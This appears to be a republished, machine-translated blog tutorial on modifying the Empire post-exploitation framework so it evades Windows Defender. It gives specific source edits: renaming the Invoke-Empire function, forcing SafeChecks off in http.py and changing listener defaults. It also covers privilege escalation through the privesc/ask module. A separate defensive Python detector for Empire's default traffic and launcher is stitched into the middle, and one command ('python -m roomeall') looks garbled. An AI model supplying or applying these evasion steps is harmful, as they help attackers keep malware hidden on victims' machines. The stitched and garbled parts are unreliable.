
How to modify Empire to bypass Windows Defender

2025-03-29 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/03 Report--

This article introduces how to modify Empire to bypass Windows Defender. It is quite detailed and has some reference value; interested readers are encouraged to read it through.

Antivirus evasion has always been one of the research directions I am most interested in. When I was studying computer science many years ago, I proposed a thesis topic to my advisors: improving antivirus engines so they could detect polymorphic viruses by mapping execution flows in binaries. As the research progressed, however, the idea was eventually rejected, so I chose another topic.

If your job is penetration testing or red teaming, antivirus bypass is a necessary skill. But I have to say it is also a frustrating area: although signature-based antivirus software does little to stop real threats, it can still cause us a lot of trouble.

We know the best way to evade antivirus software is to write your own tools: a simple reverse shell of your own, or, if you have enough money and time, a complete C2 framework developed from scratch. Most people, however, still rely on open source (and commercial) tools developed by others in the security community.

Speaking of which, I have to mention Empire. Empire is a post-exploitation agent that bundles a variety of offensive modules. It is a very powerful tool that can be used as part of an offensive operation, provided it is not flagged by antivirus during execution. There was a time when Empire was very good at evading products like Windows Defender. Not anymore. If you create a generic http listener agent payload and execute it in memory, without even touching disk, you may see something like this.

As you can see, Windows Defender detects and blocks our behavior.

But don't forget that Empire is a free and open source tool, and we can try to bypass client-side antivirus software by modifying some key areas.

Before we start testing, turn off "Cloud-delivered protection" in Windows Defender, and in particular "Automatic sample submission". We don't want any of our tests to reach the Internet and end up in Windows Defender's distributed signatures. Leave "Real-time protection" on, though, so that we can test execution.

Remember! Whatever you do, don't upload the payload to VirusTotal, or all your efforts will be in vain. As you will learn below, Windows Defender can detect Empire even if the initial payload passes the antivirus check.

Now that our test lab environment is ready, it's time to start using Empire.

In previous attempts to bypass Windows Defender, I set the misc options within the Empire launcher payload, but failed.

Then I tried to get around it through obfuscation, running the payload through various PowerShell obfuscation tools. Run it through Unicorn? Failed. Run it through the Veil Framework? Failed. Run it through Empire's own built-in Invoke-Obfuscation? Still failed.

But I noticed that by using the obfuscation tools I was able to write the payload to disk, essentially bypassing antivirus signatures; it was only detected and blocked at execution time.

Dissecting Empire

The initial payload generated by Empire is called a "stager", or, to be exact, the stage0 payload. A stager is code that remotely downloads and executes another stager or the actual payload. In our example we will use the multi/launcher PowerShell stager to reach the http listener.

Testing the stage0 payload is actually very simple: generate the payload, write it to a file, and transfer it to the Windows machine. If it triggers an antivirus warning when it hits disk, you have a lot of other work to do. If it transfers and executes normally, you have a usable stager.

A very important note! During my testing I ran into a problem: after repeated payload tests, Windows Defender is likely to flag all PowerShell files as viruses, even empty files! If this happens, restart the VM or your computer. My guess is that Windows Defender has learned that the host from which I am transferring the files is malicious, so PowerShell gets disabled no matter what the file contains.

You may be surprised that a multi/launcher stager generated with the options shown in Empire can bypass Windows Defender. I won't tell you the exact options I use, because I know someone would use them immediately and, ignoring my warnings, upload them to VirusTotal. But I will show you the options I suggest changing.

Recommended modified Empire http listener options

Option: description. Default value.

DefaultProfile: the three URLs and the User-Agent string that Empire calls at different times. Default: /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

ServerVersion: web server version identifier. Default: Microsoft-IIS/7.5

Host: your host (or IP) and port number. The port should be the same as the Port option.

Port: the port the listener binds to; must match the port in Host.

UserAgent: the user agent Empire sends to simulate real web browser traffic. Default: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

StagerURI: the URI provided to the stager. /download must be included to work without additional modifications.

CertPath: certificate path. The default self-signed certificate created when setting up Empire is at ./Empire/Data. Depending on the complexity of the environment, the self-signed certificate may not work; Windows Defender doesn't mind self-signed certificates.

DefaultJitter: random delay when sending beacon calls to the Empire server. Default: 0.0

Launcher: the command used to execute the stager. Default: powershell -noP -sta -w 1 -enc
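The defaults in the table above are also what a defender can match on when an operator leaves them unchanged. As an added example (not code from the article or from the Empire project), the following Python scores a constructed proxy log for the default profile URIs, User-Agent and Server header, and checks a process command line for the default launcher flags; the log format, client and server addresses are invented for the example.

```python
import re
from collections import defaultdict

# Default http listener values quoted from the article's table; a network sensor
# can match them exactly when an operator leaves the profile unchanged.
DEFAULT_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
DEFAULT_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
DEFAULT_SERVER = "Microsoft-IIS/7.5"

# Constructed sample proxy log in an invented tab-separated format:
# time, client, method, server:port, path, User-Agent, response Server header
SAMPLE_LOG = """\
10:00:01\t10.0.0.5\tGET\t203.0.113.10:80\t/admin/get.php\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\tMicrosoft-IIS/7.5
10:00:06\t10.0.0.5\tGET\t203.0.113.10:80\t/news.php\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\tMicrosoft-IIS/7.5
10:00:11\t10.0.0.5\tPOST\t203.0.113.10:80\t/login/process.php\tMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\tMicrosoft-IIS/7.5
10:00:12\t10.0.0.7\tGET\t198.51.100.20:443\t/news.php\tMozilla/5.0 (X11; Linux x86_64) Firefox/120.0\tnginx
"""

def score_beacons(log_text, min_uris=2):
    """Group requests by (client, server) and return a score for pairs that hit
    at least min_uris of the default URIs; the default UA and Server add 1 each."""
    seen = defaultdict(lambda: {"uris": set(), "ua": False, "server": False})
    for line in log_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 7:
            continue  # skip malformed lines instead of crashing on them
        _, client, _, server, path, ua, srv_hdr = fields
        entry = seen[(client, server)]
        if path in DEFAULT_URIS:
            entry["uris"].add(path)
        entry["ua"] |= ua == DEFAULT_UA
        entry["server"] |= srv_hdr == DEFAULT_SERVER
    return {key: len(s["uris"]) + int(s["ua"]) + int(s["server"])
            for key, s in seen.items() if len(s["uris"]) >= min_uris}

# Default Launcher from the same table: powershell -noP -sta -w 1 -enc <base64>
LAUNCHER_RE = re.compile(r"powershell(\.exe)?\s+-nop\s+-sta\s+-w\s+1\s+-enc\b", re.I)

def is_default_launcher(cmdline):
    """True when a process command line carries Empire's default launcher flags."""
    return LAUNCHER_RE.search(cmdline) is not None
```

A single default URI from a browser is common noise, which is why the score requires at least two of the three profile paths from the same client/server pair before the UA and Server header add confidence.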

Recommended modified Empire multi/launcher options

Option: description. Default value.

Listener: the listener to generate the stager for. Required.

UserAgent: user agent string. Default: default

SafeChecks: attempts to detect whether the launcher is running in a sandbox. Default: True

Obfuscate: obfuscate the automatically generated launcher code. Default: False

ObfuscateCommand: the obfuscation command used. Default: Token\All\1,Launcher\STDIN++\12467

Here's a hint: set SafeChecks to False. SafeChecks attempts to determine whether the stager is running in an antivirus sandbox. Disabling it also removes a lot of generated code, and since we are being detected by antivirus software anyway, it obviously isn't working properly.

With a payload "weaponized" like this, does that mean we can now run Empire? The payload executes as shown below, and you will see an initial connection followed by "Sending stage 1!". Then there is a problem.

During testing, I decided to turn off antivirus protection, start the Empire agent on the Windows host, and then turn the antivirus back on. To my excitement, my Empire beacon did not die! So as long as we can get Empire started, it survives. But why can't it start?

Digging into the Empire code base, I looked at where the stage1 code is generated. This code establishes the encrypted session that is meant to avoid detection, but it is not encoded in any way itself. After some trial and error editing the file piece by piece, I determined that the problem is the Invoke-Empire function name. As suggested in the Black Hills Information Security article, changing the function name to Invoke-RandomStringHere is a necessary step to prevent detection. Although all we have to do is rename the Invoke-Empire function, it would be a big improvement if you made further changes to the stage1 code.

Edit ./Empire/data/agent/stagers/http.ps1:

Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy

Edit ./Empire/data/agent/agent.ps1:

function Invoke-Empire {

Let's try running our Empire stager again.

You can see that we have successfully bypassed Windows Defender!

Because the test was run on a fully patched Windows 10 host, there aren't many ways to escalate privileges. So let's try the powershell/privesc/ask module, which pops up a dialog asking the user whether they want to run PowerShell as an administrator. The module successfully pops up the dialog, which is a good sign! I click Yes! But nothing happens.

I admit this left me a little confused. If my stager works during initial exploitation, why can't I escalate privileges? After some debugging, I was able to capture the stager sent by the privesc/ask module. Although it contains some of the changes I set in the multi/launcher configuration, there is a clear difference: it also contains the SafeChecks code that we set to False!

I'm not sure whether the SafeChecks code included here is caused by a bug in Empire. However, there is a current problem with the SafeChecks code, which seems to be confirmed by an Empire bug report. Simply forcing the option to False at all times solves our problem.

Edit ./Empire/lib/listeners/http.py:

def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
    """
    Generate a basic launcher for the specified listener.
    """
    # Add this line to override SafeChecks
    safeChecks = 'False'

Run `python -m roomeall` and restart Empire. Then start powershell/privesc/ask again.

That is all the content of the article "How to modify Empire to bypass Windows Defender". Thank you for reading! I hope the content shared here helps you; for more related knowledge, follow the industry information channel!
